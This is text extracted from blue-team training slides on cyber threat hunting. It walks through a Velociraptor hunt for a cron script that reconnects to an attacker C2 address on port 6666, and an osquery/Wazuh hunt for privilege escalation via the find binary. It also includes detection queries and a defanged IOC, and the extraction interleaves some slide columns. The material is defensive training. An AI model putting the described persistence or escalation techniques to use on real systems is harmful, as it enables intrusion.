CYBERWARFARE LABS

Blue Team
Fundamentals
Module : 04 | CYBER THREAT HUNTING
PROACTIVE CYBER
THREAT HUNTING
INTRODUCTION TO PROACTIVE CYBER THREAT HUNTING
● Cyber threat hunting is a proactive and iterative
process of searching, detecting, and mitigating ● General overview of CTH
cyber threats within a network environment. ● Roles & Working of CTH
● Hunting cyber threats with OSquery
● . Threat hunting goes beyond traditional security ● Foundational overview about MITRE ATT&CK
measures, which primarily focus on preventing, framework
detecting, and responding to known and unknown ● Cyber Kill Chain
cyber threats.
General overview of
Threat Hunting
General overview of Cyber Threat Hunting

By establishing an effective cyber threat hunting

Cyber Threat Hunting generally falls under the
team will result the organisation with better detection
proactive defensive measure.
against advance cyber threat.

The ultimate goal for CTH is to identify and

Threat hunting falls under the hypothesis driven
eliminate cyber attacks which generally evades
investigation and detection, by following such
cyber defence and perform an stealthier
approach will result us with a better visibility and
operations
understanding about the attacker end goal
General overview of Cyber Threat Hunting

The general hierarchy of Threat hunting will be

handled by the group of experts who has a very good
skill set of both offensive and defensive knowledge.

This particular Threat Hunting role is not be

recommend for the beginners.
General overview of Threat Hunting

Threat Hunting teams generally operate under a

general shift Threat hunting often involves in collaborate
with several other security teams, such as
● Involved in developing various hypothesis SOC, Incident Response, and Forensics, to
● Create and hunt for know and unknown cyber identify and determine the criticality and
threats various pattern of various threats.
● Contribute to the enhancement of overall cyber
defence
 Working of
Threat Hunting
Working of Threat Hunting
Life Cycle of Cyber Threat Hunting Create Hypothesis

Involved in creating
various hypothesis
based on the known and
Cyber Threat Hunter often involves in iterative loops and emerging cyber attacks

continuous refinement of strategies based on the evolving

threat landscape and organizational changes. Investigate with tools &
Enhance the Detection
Techniques

Enhance the overall Investigated the

detection based on the hypothesis based on
Various phases of Cyber Threat Hunting includes: findings various tools and
technology
1. Creating Hypothesis
2. Investigating with Tools & Techniques
3. Uncover new patterns Uncover new patterns

4. Enhance the detection Uncover and determine

various attack pattern
which incluse IOC, IOA
etc.
Creating Hypothesis
The initial part of cyber threat hunt will be begins by creating a threat hunting hypothesis, this particular
hypothesis creation will guide the analyst with their complete investigative path.

Some majorly created hypothesis are been listed below:

The mentioned hunt situations are designed for
1. Create a hunt for suspicious schedule task
your basic understanding based on the
2. Create a hunt for SUID based exploit
organization business model, emerging cyber
3. Create a hunt for botnet based attack
threats and threat landscape these hypotheses
4. Create a hunt for privilege escalation activity detected
get changed frequently
5. Create a hunt fot APT based pattern observed
Investigating with Tools & Techniques
The next phase of threat hunting is to investigate the created
hypothesis with various tools and technology Effective threat hunting
often involves a combination of these tools and techniques. below
listed are some commonly used threat hunting tools:
1. HELK
2. APT-Hunter
3. Thor APT Scanner
4. Deepblue CLI
5. LOKI
6. velociraptor
Uncover New Attack pattern
An effective operation of Tools and techniques will
generally uncover new malicious patterns of behavior
and adversary TTPs.

If an effective hypothesis is been framed and been

discover by various operation hunt, these result will
helps us to identified new intel feed which include IOC,
IOA, adversaries pattern etc.
Enhance the Detection
By combining these strategies and assessment
organizations can enhance their ability to identify and
respond to a wide range of security threats.

Its recommend to continuously refine and expand threat

hunting hypotheses based on new threat intelligence,
insights gained from previous investigations.
Threat Hunting Working : Phase 01
Threat Hunting Working : Phase 02
Threat Hunting
Working : Phase 03
Scheduled Task/Job
Threat Hunting Demo
What is Schedule Task/Job
Schedule task/job is a simply process of executing the
malicious code recurrently on the targeted victim.

After getting a successful initial access the adversary

generally try to maintain a stable persistence with the
targeted victim.
Working of Schedule Task/Job
Let us assume a scenario where the
attacker is been trying to maintain a stable
shell in the targeted victim, to achive that
the attacker might go with creating a
scheduled task which constantly initiate a
connection with the attacker C2, even if the
connection got accidentally dropped the
scheduled task re-initiate the process and
get connect back with the C2
Demo
Hypothesis
The hypothesis aims to investigate and conduct a thorough investigation into a suspected
scheduled task detected incident with the goal of identifying the source, scope, and impact of
the attack, and implementing measures to prevent future occurrences.
Scheduled Task/Job Threat Hunting Approach

1. Identify and retrieve the list of Scheduled task

2. Investigate the attachments
To enhance the threat hunt capabilities
3. Identify and determine the suspected activity.
below listed are some approaches and
4. Retrieve the detected script file
techniques to uncover or identify
5. Static File Analysis
suspicious scheduled task.
6. Dynamic File Analysis
7. Analyse File Content
8. Check for Network Connections
Step:01
The first step of investigation begins
by investigating the activity via DFIR
solutions, in our demonstration we
will be performing the threat hunt
with the tool named velociraptor
Step:02 : Identify and retrieve the list of Scheduled task

To Identify and retrieve, we proceed performing a

simple velociraptor hunt. Follow the below
mentioned steps and observe the results. By following such approach we can
successfully enumerate all scheduled tasks

1. Create a NEW HUNT on relevant systems and analyze their

2. Selecting the artifacts properties.

3. Configuring Parameters
4. Review request
Step:02 : Create a NEW HUNT

To perform a HUNT it is
recommended to mention a
detailed description and the rest
details like expiry date etc. mention
such record helps to track us with
the hunt details.
 Step:02 : Selecting the artifacts
In-general artifact is simply a structured YAML file
containing a query, with a name attached to it.

Generally this allows Velociraptor users to search for the

query by name or description and simply run the query
on the endpoint without necessarily needing to
understand or type the query into the UI.

It is always recommended to select the appropriate

velociraptor query, for our operation we will prefer using
the [Link] to retrieve and list all crontab.
Step:02 : Configuring Parameters
Configuring parameters allows
Use the below parameters to retrieve cronTabGlob
us to customise results to meet
/etc/crontab,/etc/cron.d/**,/var/at/tabs/**,/var/spool/cron/**,/var/spool/cron/crontabs/**
our specific requirements.
Mentioned the observed file
Use the below parameters to retrieve cronTabScripts
path to retrieve the detailed
/etc/[Link]/*,/etc/[Link]/*,/etc/[Link]/*,/etc/[Link]/*
information of it.
Step:02 : Review request

After all the configuration it's recommended to

finally review it before executing the launch.
Step:02 : Result
As per the result we identify multiple cron jobs on every host, it's recommended to check each and every host
result to identify the suspected activity.
Step:02 : Result
Analyze the properties of scheduled
tasks, focusing on tasks with suspicious
or non-standard configurations, such
as obfuscated command-line
arguments, unexpected triggers, or
unusual file paths.

Detected File Name

[Link]

Detected File Path

/home/bt-emp01/Desktop/testing/[Link]
Step:03 : Retrieve the detected script file

To Identify and determine the file hash,

we proceed with another simple
velociraptor hunt. Follow the below
mentioned steps and observe the results.

To perform a HUNT it is recommended to

mention a detailed description and the
rest details like expiry date etc. mention
such record helps to track us with the
hunt details.
Step:03 : Selecting the artifacts
In-general artifact is simply a structured YAML file containing
a query, with a name attached to it.

Generally this allows Velociraptor users to search for the

query by name or description and simply run the query on
the endpoint without necessarily needing to understand or
type the query into the UI.

It is always recommended to select the appropriate

velociraptor query, for our operation we will prefer using the
[Link] to retrieve and investigate the
observed file.
Step:03 : Configuring Parameters
Configuring parameters allows us to
customise results to meet our Use the below parameters to retrieve cronTabGlob
specific requirements. Mentioned the
/home/bt-emp01/Desktop/testing/[Link]
observed file path to retrieve the
detailed information of it.
Step:03 : Review request

After all the configuration it's recommended to

finally review it before executing the launch.
Step:03 : Result
As per the result we identify the host BT-EMP01 consists of the following detected file. On further deep digging
the result we observed the HASH of the detected file under the result section.
Step:03 : Result
Determining the hash of a detected suspected file is a
crucial step in cybersecurity, this typically helps Hash
Detected File Hash
values provide a unique and consistent identifier for files.
36a4f7be20e62d79a09937af72e99777f277938394532b5d8
In the context of malicious files, this enables security
a9cb2de19b869e5
professionals to catalogue and share information about
specific threats based on their hash values.
Step:04 : Static File Analysis

Online security tools such as Virustotal use hash

values to create signatures for known malware.
Static file analysis involves examining the
By comparing the hash of a file against a
characteristics and content of a file without
database of malicious hashes, security solutions
executing or running it. This type of analysis
can quickly identify threats.
provides insights into the file's structure,
metadata, code, and potential security risks,
Navigate to the [Link]
and upload the detect HASH
Step:04 : Static File Analysis
As per the VT result we observed that the detected file hash doesn't not match with any suspicious report hashes.

Note: In majority of the cases hash based investigation will be failed and simple result with the clean status. In such
cases it is recommended to proceed investigating it via dynamic analysis.
Step:05 : Dynamic File Analysis
Download and upload the suspected file through one or more reputable antivirus or anti-malware tools. Many
antivirus programs can detect known malware signatures.

Using via velociraptor we can directly get download the detected file into our local machine for further analysis,
Step:05 : Dynamin File Analysis

Its is recommend to download the file in a sandbox/isolated environment, A sandbox environment is an isolated
and controlled space designed to analyze and execute potentially malicious code without affecting the production
network or systems.
Step:05 : Dynamin File Analysis

After downloading or retrieving the suspected

file its is recommended to upload the detected
file into the VT to observe the finding for the
same.

As per VT the resulted detected activity seems

to be a legit function
Step:06 : Analyse File Content

The next step of investigation is to open the detected file in a text editor and carefully review the script's content.
Look for any suspicious or unfamiliar commands, functions, or code snippets.
Opening the .sh file using a text editor, such as VS-code, nano, vim, gedit in a secure, isolated environment.

As per the result we identified that the external communication being invoked within the script
Step:07 : Check for Network Connections

As per our dynamic analysis the detected malicious script is trying to communicate to the detected
attacker IP [168[.]126[.]4[.]93] via port 6666, hence its recommended to cross verify the network
connections.

Examine network logs for any corresponding increases in outbound traffic during the execution of
suspicious scheduled tasks. This could indicate communication with external servers.
Step:08 : Check for Network Connections
Based on our findings, craft a search request on a network monitoring tool, execute the below
mentioned command and observe the findings.

[Link] == [Link] && [Link] == [Link] && [Link] == 6666

 Privilege Escalation
Threat Hunting Demo
What is Privilege Escalation
Privilege escalation is a process of escalating the lower
privilege to the higher for seeking to increase their control
over a compromised system.

it generally involves elevating one's privileges beyond

the normal or intended level, often to execute
unauthorized actions or access sensitive information.
Working of Privilege Escalation
Let us assume a scenario where the
attacker successfully logged into the
enterprise with the low privilege user, later if
any vulnerable high privilege service are
been identified the attacker can easily
elevate from low privilege to an higger
privileged user.
Demo
Hypothesis
This hypothesis aims to investigate potential methods employed by threat actors to elevate
privileges and gain unauthorized access to sensitive resources.
Step:01
The first step is to conduct an
investigation using the SIEM |
Wazuh Console.
Privilege Escalation Threat Hunting Approach

1. Checking the root login activity

2. Identify the command execution associated with the
To enhance the threat hunt capabilities
activity
below listed are some approaches and
3. Retrieve the list of processes where the EUID != UID
techniques to uncover or identify
4. Determine the command executed on behalf of the
suspicious privilege escalation activity.
“Find” Process
5. Determine the root cause of the entire process
6. identify the external IP associated with SSH connection
Step:01 : Checking the root login activity
Our Initial investigation will begin by checking the root login activity on the host, by executing the below
command on the SIEM : ELK we can observe all the root authentication from the host machine

Command:

predecoder.program_name: sudo and location: /var/log/[Link]

 Step:02 : Identify the command execution associated with
the activity
After determining the root login activity,
execute the below command to determine
the event which either executed or triggers
the execution of root activity.
Command:

predecoder.program_name: sudo and location:

/var/log/[Link] and [Link]: emp01
Step:02 : Identify the command execution associated with
the activity
From the below result we observed 2 root login activity initiated by the user emp01 via the service named find,

Note: For better visualization use the visualize section

Step:03 : Retrieve the list of processes where the EUID != UID

Osquery is generally an open-source, cross-platform

endpoint security and monitoring tool developed by
Facebook.

OSQuery provides a standardized and structured way

to retrieve information about the configuration,
performance, and security of endpoints (e.g.,
desktops, laptops, servers) in a network.
Step:03 : Retrieve the list of processes where the EUID != UID

the next step of investigation is to retrieve the list of processes where the EUID is not equal to UID, Execute the
below command to observe the result.

SELECT parent,pid,uid,name,euid from processes where uid!=euid;

Step:04 : Command executed on behalf of the “Find” Process

As per our previous result we identified that the find process has been executed with privileges beyond its original
user's privileges. use the below command to retrieve the list of command executed on behalf of the “Find” Process

SELECT parent,pid,shell_history.command,[Link] FROM shell_history LEFT JOIN processes ON

shell_history.uid = [Link] where euid!=[Link] and command LIKE "%find%";
Step:05 : Determine the root cause of the entire process

After observing the finding, we can investigate the root cause of the entire process, for determining the root
cause it been recommended to investigate the parent process changing activity to determine the execution flow,
use the below mention custom created query for determining the execution flow

WITH RECURSIVE ProcessChain AS (SELECT [Link],[Link] AS parent_pid,[Link],[Link],cast([Link] as varchar(10)) AS

chain,cast([Link] as varchar(10)) AS uid_chain FROM processes AS p WHERE [Link] = '14241' UNION ALL SELECT
[Link],[Link] AS parent_pid,[Link],[Link],[Link] || '->' || cast([Link] as varchar(10)),pc.uid_chain || '->' || cast([Link]
as varchar(10)) FROM processes AS p JOIN ProcessChain AS pc ON [Link] = pc.parent_pid) SELECT pid, parent_pid,
name, uid, chain, uid_chain FROM ProcessChain ORDER BY chain;
Step:05 : Determine the root cause of the entire process
Step:06 : External IP associated with SSH connection

From over previous result we observed an SSH connection, for further deep checking the SSH activity use the
below command to retrieve the activity with the observed PID

SELECT parent,[Link],username, host FROM last JOIN processes ON [Link] = [Link] where
[Link]=4953731;
Foundational overview
about MITRE ATT&CK
framework
Foundational overview about MITRE ATT&CK framework
MITRE ATT&CK framework is a comprehensive
matrix of tactics and techniques used by threat
hunters, red teamers, and defenders to better
classify attacks and assess an organization's risk.

The aim of the framework is to improve

post-compromise detection of adversaries in
enterprises by illustrating the actions an attacker
may have taken.
Foundational overview about MITRE ATT&CK framework
Foundational overview about MITRE ATT&CK framework
The primary objectives of the MITRE ATT&CK framework are as follows:
● Threat hunting and knowledge sharing
● Security assessment and gap analysis
● Incident detection and response
● Red and Blue Team

The MITRE ATT&CK framework is continually updated and expanded to include new threat actor
behavior and evolving attack techniques, making it a valuable resource for organizations seeking to
enhance their cybersecurity defenses and threat intelligence capabilities.
Key Components of Mitre Att&ck

Campaigns Gorup
MITRE ATT&CK plays a significant role in enhancing
cyber threat hunting capabilities by providing a
standardized framework for understanding and Mitre Att&ck
categorizing the tactics, techniques, and procedures
(TTPs) employed by adversaries.

Software
Cyber Kill Chain
Overview of Cyber Kill Chain

The Cyber Kill Chain is a concept developed by

Lockheed Martin that describes the stages of a
cyber attack from the initial reconnaissance to
the exfiltration of data
The goal of the Cyber Kill Chain is to help
organizations better understand the attack lifecycle,
enhance threat intelligence, and develop more
effective cybersecurity strategies
Overview of Cyber Kill Chain
Overview of Cyber Kill Chain

Organizations often use the Cyber Kill Chain to inform their cybersecurity strategies,
enhance threat detection capabilities, and develop proactive defense measures to disrupt
or prevent attacks at various stages of the kill chain.
 Thank You
For Professional Red Team / Blue Team / Purple Team / Cloud Cyber Range labs / Trainings, please contact

support@[Link]
To know more about our offerings, please visit: [Link]